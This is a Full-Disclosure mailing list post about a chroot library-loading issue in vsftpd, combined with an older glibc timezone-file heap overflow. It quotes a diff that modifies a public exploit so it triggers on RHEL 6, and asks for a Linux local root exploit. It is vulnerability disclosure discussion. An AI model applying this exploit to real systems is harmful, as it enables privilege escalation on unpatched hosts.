Does that mean that dividead's bug in glibc was not patched? I have the feeling that it wasn't, dividead's blogpost is from mid 2009 Awkward :>
Am 13. Dezember 2011 21:12 schrieb Ramon de C Valle <rcva...@redhat.com>: > > >> as you can obviously see vsftpd loads the /lib/libgcc_s.so.1 inside >> the chroot, >> so voila we have the same issue as with FreeBSD ftpd/proftpd. >> I am now looking into the possibility to modify >> http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c >> >> and use as the library. It will be a fun Proof of Concept. > > Hats off to you! :) > >> >> Anyone with an up2date linux local root which only makes use of >> syscalls? :> >> >> All this was tested on a CentOS 5.5 installation, vsFTPd 2.3.4 was >> compiled from sources >> and launched from xinetd. > > I've also triggered this in RHEL 6 with its latest version of vsftpd > installed with the following changes made to dividead's exploit: > > --- a.c 2011-12-13 18:05:50.701999990 -0200 > +++ b.c 2011-12-13 18:06:26.874000006 -0200 > @@ -59,8 +59,8 @@ > total_size = ((total_size + __alignof__ (struct ttinfo) - 1) > & ~(__alignof__ (struct ttinfo) - 1)); > > - /* value of chars, to get a malloc(0) */ > - evil2 = 0 - total_size; > + /* value of chars, to get a malloc(500) */ > + evil2 = 0 - total_size + 500; > PUT_32BIT_MSB(evil.tzh_charcnt, evil2); > > p = (char *)&evil; > @@ -68,6 +68,6 @@ > printf("%c", p[i]); > > /* data we overflow with */ > - for (i = 0; i < 50000; i++) > + for (i = 0; i < 500000; i++) > printf("A"); > } > > > -- > Ramon de C Valle / Red Hat Security Response Team _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/